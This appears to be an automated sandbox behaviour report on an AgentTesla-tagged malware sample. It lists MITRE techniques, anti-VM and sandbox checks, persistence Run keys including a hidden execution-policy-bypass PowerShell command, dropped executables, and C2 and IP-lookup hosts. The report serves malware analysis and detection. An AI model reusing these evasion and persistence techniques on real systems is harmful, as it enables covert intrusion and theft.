agenttesla | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	new.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	4516	powershell.exe
111	4516	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4516	powershell.exe
7032	powershell.exe
4676	powershell.exe
5284	powershell.exe
5868	powershell.exe
1392	powershell.exe
8732	powershell.exe
236	powershell.exe
1560	powershell.exe
4860	powershell.exe
6412	powershell.exe
1908	powershell.exe
2068	powershell.exe
2368	powershell.exe
5532	powershell.exe
7464	powershell.exe
4152	powershell.exe
4780	powershell.exe
3788	powershell.exe
1364	powershell.exe
5632	powershell.exe
6324	powershell.exe
4840	powershell.exe
8576	powershell.exe
2520	powershell.exe
5392	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	Miner.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2924	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x000100000002a9df-46.dat	net_reactor
behavioral1/memory/3884-53-0x00000000002E0000-0x000000000084C000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	new.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	new.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe	sc.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe	sc.exe

Executes dropped EXE 35 IoCs

pid	Process
1444	svcyr.exe
3008	nslfoo.exe
1660	cp.exe
1900	svcyr.exe
3884	hv.exe
4120	socks5-clean.exe
3032	sc.exe
4868	1bz7KfahvU.exe
4536	d21cbe21e38b385a41a68c5e6dd32f4c.exe
4616	SvCpJuhbT.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
3460	crazyCore.exe
1500	csrss.exe
1444	new.exe
916	injector.exe
2344	windefender.exe
4948	windefender.exe
4712	MSI.CentralServer.exe
1596	runtime.exe
2756	runtime.exe
4660	runtime.exe
3744	Build.exe
4904	Miner.exe
4292	Stealer.exe
2432	net.exe
3408	ProjectE_5.exe
200	ghjk.exe
452	ama.exe
456	idrB5Event.exe
2968	xmrig.exe
4600	BLHisbnd.exe
2520	net.exe
2904	EPQ.exe
232	tpeinf.exe
7028	696517839.exe

Loads dropped DLL 1 IoCs

pid	Process
3884	hv.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000500000002aa02-366.dat	themida
behavioral1/memory/1444-376-0x0000000000760000-0x0000000000CE0000-memory.dmp	themida
behavioral1/memory/1444-448-0x0000000000760000-0x0000000000CE0000-memory.dmp	themida

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000002aa14-435.dat	upx
behavioral1/memory/2344-436-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/4948-440-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2344-442-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/4948-450-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/4948-481-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	91.211.247.248

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000600000002ab86-32154.dat	vmprotect

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_3 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\config\\runtime.exe"	1bz7KfahvU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks_powershell = "Powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\socks5-clean.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\sc.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sc.exe"	sc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\config\\runtime.exe"	1bz7KfahvU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_2 = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\config\\runtime.exe"	1bz7KfahvU.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	new.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Legitimate hosting services abused for malware hosting/C2 1 TTPs 33 IoCs

Web Service

T1102

flow	ioc
1	pastebin.com
12	bitbucket.org
332	raw.githubusercontent.com
2537	raw.githubusercontent.com
2382	raw.githubusercontent.com
37	pastebin.com
136	pastebin.com
331	raw.githubusercontent.com
385	raw.githubusercontent.com
3168	raw.githubusercontent.com
4798	raw.githubusercontent.com
327	raw.githubusercontent.com
333	raw.githubusercontent.com
336	raw.githubusercontent.com
384	raw.githubusercontent.com
85	raw.githubusercontent.com
322	raw.githubusercontent.com
3284	raw.githubusercontent.com
3628	raw.githubusercontent.com
318	raw.githubusercontent.com
329	raw.githubusercontent.com
1	raw.githubusercontent.com
4	bitbucket.org
230	pastebin.com
317	raw.githubusercontent.com
387	raw.githubusercontent.com
2379	raw.githubusercontent.com
3229	raw.githubusercontent.com
2539	pastebin.com
320	raw.githubusercontent.com
388	raw.githubusercontent.com
750	raw.githubusercontent.com
2380	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
326	whoer.net
1	ip-api.com
1	whoer.net
134	api.ipify.org

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000300000002aa22-9020.dat	autoit_exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	Process not Found
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Miner.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	Process not Found

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1444	new.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3884 set thread context of 2608	3884	hv.exe	105
PID 2252 set thread context of 1100	2252	notepad.exe	109
PID 1444 set thread context of 1488	1444	new.exe	145
PID 2432 set thread context of 2520	2432	net.exe	343
PID 2904 set thread context of 5828	2904	EPQ.exe	199
PID 4904 set thread context of 5188	4904	Miner.exe	202

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\nslfoo.exe	svcyr.exe
File opened for modification	C:\Windows\nslfoo.exe	svcyr.exe
File created	C:\Windows\Tasks\MSI.CentralServer.job	cp.exe
File opened for modification	C:\Windows\rss	d21cbe21e38b385a41a68c5e6dd32f4c.exe
File created	C:\Windows\rss\csrss.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
File created	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 16 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6288	sc.exe
4200	sc.exe
3448	sc.exe
6992	sc.exe
6156	sc.exe
7656	sc.exe
4780	sc.exe
2392	sc.exe
3576	sc.exe
3032	sc.exe
4620	sc.exe
1304	sc.exe
7876	sc.exe
5540	sc.exe
2268	sc.exe
6068	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000400000002aa83-20473.dat	pyinstaller
behavioral1/files/0x000100000002ab23-21243.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
5064	4536	WerFault.exe	102
2688	2648	WerFault.exe	115
756	1488	WerFault.exe	145
2572	4292	WerFault.exe	166
756	2520	WerFault.exe	189
1212	2520	WerFault.exe	189
8204	3244	WerFault.exe	211
8916	6768	WerFault.exe	209
6336	3244	WerFault.exe	211
200	6768	WerFault.exe	209
4076	6768	WerFault.exe	209
8892	6768	WerFault.exe	209
5992	6768	WerFault.exe	209
5968	8140	WerFault.exe	207
6700	6768	WerFault.exe	209
2736	6768	WerFault.exe	209
3512	6768	WerFault.exe	209
7004	6768	WerFault.exe	209
6728	6768	WerFault.exe	209
6896	5216	WerFault.exe	215
3192	1204	WerFault.exe	263
8516	1204	WerFault.exe	263
1028	1204	WerFault.exe	263
6804	1204	WerFault.exe	263
7968	1204	WerFault.exe	263
4600	1204	WerFault.exe	263
5244	1204	WerFault.exe	263
1740	1204	WerFault.exe	263
8924	1204	WerFault.exe	263
6152	1204	WerFault.exe	263
8088	1204	WerFault.exe	263
6172	1204	WerFault.exe	263
6800	1204	WerFault.exe	263
7088	1204	WerFault.exe	263
6880	5864	WerFault.exe	321
7004	8004	WerFault.exe	318
7696	1204	WerFault.exe	263
5996	7992	WerFault.exe	337
1832	1204	WerFault.exe	263
5816	8312	WerFault.exe	354
7428	7664	WerFault.exe	376
4360	828	WerFault.exe	372
3696	828	WerFault.exe	372
7628	8796	WerFault.exe	387
7952	6080	WerFault.exe	233
6136	1204	WerFault.exe	263
5308	1204	WerFault.exe	263
4896	1204	WerFault.exe	263
2328	4944	WerFault.exe	423
5484	1204	WerFault.exe	263
912	1204	WerFault.exe	263
8168	5128	WerFault.exe	433
2924	1204	WerFault.exe	263
5816	5128	WerFault.exe	433
8384	7636	WerFault.exe	447
572	6588	WerFault.exe	455
7996	6248	WerFault.exe	325
892	2688	WerFault.exe	471
6856	1204	WerFault.exe	263
5048	4952	WerFault.exe	481
6568	1204	WerFault.exe	263
3128	8220	WerFault.exe	371
7428	5992	WerFault.exe	503
4804	8220	WerFault.exe	371

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral1/files/0x000800000002aa70-19954.dat	nsis_installer_1
behavioral1/files/0x000800000002aa70-19954.dat	nsis_installer_2
behavioral1/files/0x000100000002aac4-20533.dat	nsis_installer_1
behavioral1/files/0x000100000002aac4-20533.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	nslfoo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	nslfoo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
5440	schtasks.exe
996	schtasks.exe
4388	schtasks.exe
3576	schtasks.exe
1008	schtasks.exe
7376	schtasks.exe
2132	schtasks.exe
9160	schtasks.exe
6072	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
9212	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
8828	tasklist.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	342	Go-http-client/1.1
HTTP User-Agent header	343	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2891 = "Sudan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-12 = "Azores Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-352 = "FLE Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4516	powershell.exe
4516	powershell.exe
5092	powershell.exe
5092	powershell.exe
4716	powershell.exe
4716	powershell.exe
1464	powershell.exe
1464	powershell.exe
4036	powershell.exe
4036	powershell.exe
1908	powershell.exe
1908	powershell.exe
4536	d21cbe21e38b385a41a68c5e6dd32f4c.exe
4536	d21cbe21e38b385a41a68c5e6dd32f4c.exe
4152	powershell.exe
4152	powershell.exe
3460	crazyCore.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2648	d21cbe21e38b385a41a68c5e6dd32f4c.exe
4840	powershell.exe
4840	powershell.exe
2068	powershell.exe
2068	powershell.exe
4780	powershell.exe
4780	powershell.exe
3788	powershell.exe
3788	powershell.exe
1444	new.exe
1444	new.exe
4860	powershell.exe
4860	powershell.exe
916	injector.exe
916	injector.exe
916	injector.exe
916	injector.exe
916	injector.exe
916	injector.exe
1500	csrss.exe
1500	csrss.exe
916	injector.exe
916	injector.exe
916	injector.exe
916	injector.exe
916	injector.exe
916	injector.exe
1500	csrss.exe
1500	csrss.exe
916	injector.exe
916	injector.exe
916	injector.exe
916	injector.exe
1500	csrss.exe
1500	csrss.exe
916	injector.exe
916	injector.exe
916	injector.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2904	EPQ.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3584	4363463463464363463463463.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	2608	jsc.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	4536	d21cbe21e38b385a41a68c5e6dd32f4c.exe
